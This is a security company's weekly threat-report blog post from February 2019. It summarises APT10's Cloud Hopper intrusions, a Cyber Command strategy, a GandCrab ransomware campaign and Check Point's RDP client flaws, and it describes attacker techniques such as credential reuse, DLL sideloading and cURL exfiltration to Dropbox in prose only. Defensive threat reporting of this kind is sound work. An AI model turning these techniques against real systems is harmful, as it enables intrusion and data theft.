Paul Scott

Paul Scott
on February 6, 2019

Threat Report Wednesday February 6th 2019

Threat Report

This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.

More details on Stone Panda’s (APT10) Cloud Hopper

A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018, was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, they feel highly confident that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.

The targeted companies include:

  • IT and business cloud services managed service provider (MSP)
  • An international apparel company
  • A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others

In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or lack of two factor authentication can be.

The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.

APT10 Indictment

During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using both RC4 and Salsa20 streaming ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor, only used by APT10. The backdoor was deployed using the Notepad++ updater and sideloading of a malicious DLL, as noted in APT10’s targeting of Japanese corporations in July 2018.

The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, a U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.

APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has conducted a number of accounts since 2016 and we now know they are run by the Chinese intelligence agency, the Ministry of State Security (MSS).

Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted, “Operation Cloud Hopper,” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.

In all three incidents, APT10 actors used previously acquired legitimate credentials (possibly gained via a third-party supply chain compromise) in order to gain initial access to the law firm and the apparel company.

Transformational hacking moment for U.S. Cyber Command

On February 6, 2019, RealClear released a report for a new aggressive strategy to take down cyber actors due to the high-profile attacks on the United States. And, they’re no longer just playing defense.

Gen. Paul Nakasone, commander of the U.S. Cyber Command, disclosed a “transformational moment” in how the U.S. conducts cyber operations to raise the cost in adversaries incur from attacking the United States. Nakasone did not reveal what the new strategy is, however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares to take down the communications and propaganda tool for the group.

Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.

GandCrab smash and grab with GoDaddy’s help

A large scale of GandCrab ransomware campaign was assisted by a security hole in GoDaddy DNS. GandCrab is a common ransomware family discovered in 2018. Researchers noticed that the exploit was being executed through a compromised DNS system to launch attacks. Once executed, the actors deliver GandCrab ransomware to the compromised targeted system. Researchers disclosed two phishing email themes used in this campaign: DHL Delivers and E-fax messages. We checked over the last 30 days. We saw a few organizations receive these emails. If you were affected, we have reached out to you.

Email domains




































IP addresses



So many RDP vulnerabilities!

Check Point researchers have discovered 25 vulnerabilities with 16 being critical in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the host’s computer. This infection would allow for an intrusion into the host’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.

I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack back honey pot too. Which reminds me of Wes’ blog post on forcing the pain back to the bad guys.

In one of the vulnerabilities, when using the “copy & paste” feature while connected to a malicious RDP server, the server can use the shared RDP clipboard to send files to the client’s computer.

As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.

This did not meet the bar for acknowledgement by Microsoft and no patch is planned to be released. Check Point researchers recommend that you turn off shared RDP clipboard while using RDP.

We'd love to hear your thoughts. Find us on Twitter, LinkedIn or write in to

Next: Threat Report Sunday February 3rd 2019

Share this on:

Paul Scott

Paul Scott
on February 6, 2019

Perchy Subscribe to our blog